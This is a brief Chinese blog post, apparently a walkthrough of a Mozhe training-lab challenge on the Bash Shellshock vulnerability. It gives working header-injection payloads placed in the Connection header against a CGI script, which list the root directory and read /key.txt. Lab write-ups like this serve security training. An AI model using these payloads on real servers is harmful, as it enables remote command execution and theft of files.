墨者Bash漏洞分析溯源
打开题目环境
Bash漏洞存在的路径多数在网页/cgi-bin/下,打开此网页。
1 | http://url/cgi-bin/poc.cgi |
此漏洞是存在的,使用bp抓包
把在下面的Connection的参数,改成我们的执行代码。
1 | Connection: () { :;}; echo; /bin/ls / |
继续执行我们的命令 看key.txt
1 | Connection: () { :;}; echo; /bin/cat /key.txt |
问题解决
墨者bash
Author: rowen
Permalink: http://example.com/2025/06/07/%E5%A2%A8%E8%80%85bash/
License: Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan: Do you believe in DESTINY?